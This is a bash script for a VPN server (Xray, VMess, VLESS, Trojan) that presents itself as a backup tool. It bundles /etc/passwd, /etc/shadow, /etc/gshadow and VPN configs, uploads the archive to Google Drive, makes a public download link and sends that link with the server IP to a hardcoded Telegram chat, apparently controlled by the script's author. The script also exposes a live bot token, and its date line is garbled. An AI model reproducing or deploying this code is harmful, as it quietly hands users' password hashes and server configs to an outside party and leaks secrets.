#!/bin/bash
# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# System Request : Debian 9+/Ubuntu 18.04+/20+
# Develovers » Gemilangkinasih࿐
# Email      » gemilangpremium@gmail.com
# telegram   » https://t.me/gemilangkinasih
# whatsapp   » wa.me/+6287782718065
# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Gemilangkinasih࿐

IP=$(curl -sS ipv4.icanhazip.com)
domain=$(cat /etc/xray/domain)
date=$(date +"%Y-No such file or directory-0")
clear
rm -rf /root/backup
mkdir -p /root/backup/ > /dev/null 2>&1
mkdir -p /root/backup/xray/ > /dev/null 2>&1
mkdir -p /root/backup/html/ > /dev/null 2>&1
mkdir -p /root/backup/limit/ssh/ip > /dev/null 2>&1
mkdir -p /root/backup/limit/vmess/ip > /dev/null 2>&1
mkdir -p /root/backup/limit/vless/ip > /dev/null 2>&1
mkdir -p /root/backup/limit/trojan/ip > /dev/null 2>&1
mkdir -p /root/backup/quota/vmess > /dev/null 2>&1
mkdir -p /root/backup/quota/vless > /dev/null 2>&1
mkdir -p /root/backup/quota/trojan > /dev/null 2>&1
cp /etc/passwd /root/backup/ 
cp /etc/group /root/backup/ 
cp /etc/shadow /root/backup/ 
cp /etc/gshadow /root/backup/
cp -r /etc/noobzvpns /root/backup/
cp -r /etc/kyt/limit/ssh/ip/* /root/backup/limit/ssh/ip > /dev/null 2>&1
cp -r /etc/kyt/limit/vmess/ip/* /root/backup/limit/vmess/ip > /dev/null 2>&1
cp -r /etc/kyt/limit/vless/ip/* /root/backup/limit/vless/ip > /dev/null 2>&1
cp -r /etc/kyt/limit/trojan/ip/* /root/backup/limit/trojan/ip > /dev/null 2>&1
cp -r /etc/vmess/* /root/backup/quota/vmess > /dev/null 2>&1
cp -r /etc/vless/* /root/backup/quota/vless > /dev/null 2>&1
cp -r /etc/trojan/* /root/backup/quota/trojan > /dev/null 2>&1
cp /etc/xray/*.json /root/backup/xray/
cp /var/www/html/*.txt /root/backup/html/ > /dev/null 2>&1
cd /root
zip -r $IP-$date.zip backup > /dev/null 2>&1
rclone copy /root/$IP-$date.zip dr:backup/
url=$(rclone link dr:backup/$IP-$date.zip)
id=(`echo $url | grep '^https' | cut -d'=' -f2`)
link="https://drive.google.com/u/4/uc?id=${id}&export=download"
rm -rf /root/backup > /dev/null 2>&1
rm -r /root/$IP-$date.zip > /dev/null 2>&1
clear
CHATID="-1002111692111"
KEY="6611593744:AAHFLFE_IP9jmKze_eici0gukLQsHp66zAY"
TIME="10"
URL="https://api.telegram.org/bot$KEY/sendMessage"
TEXT="
<code>☉────────────────────────☉</code>
<code>IP Server vps :</code> <code>$IP</code>
Link Backup $link
<code>☉────────────────────────☉</code>"

curl -s --max-time $TIME -d "chat_id=$CHATID&disable_web_page_preview=1&text=$TEXT&parse_mode=html" $URL >/dev/null
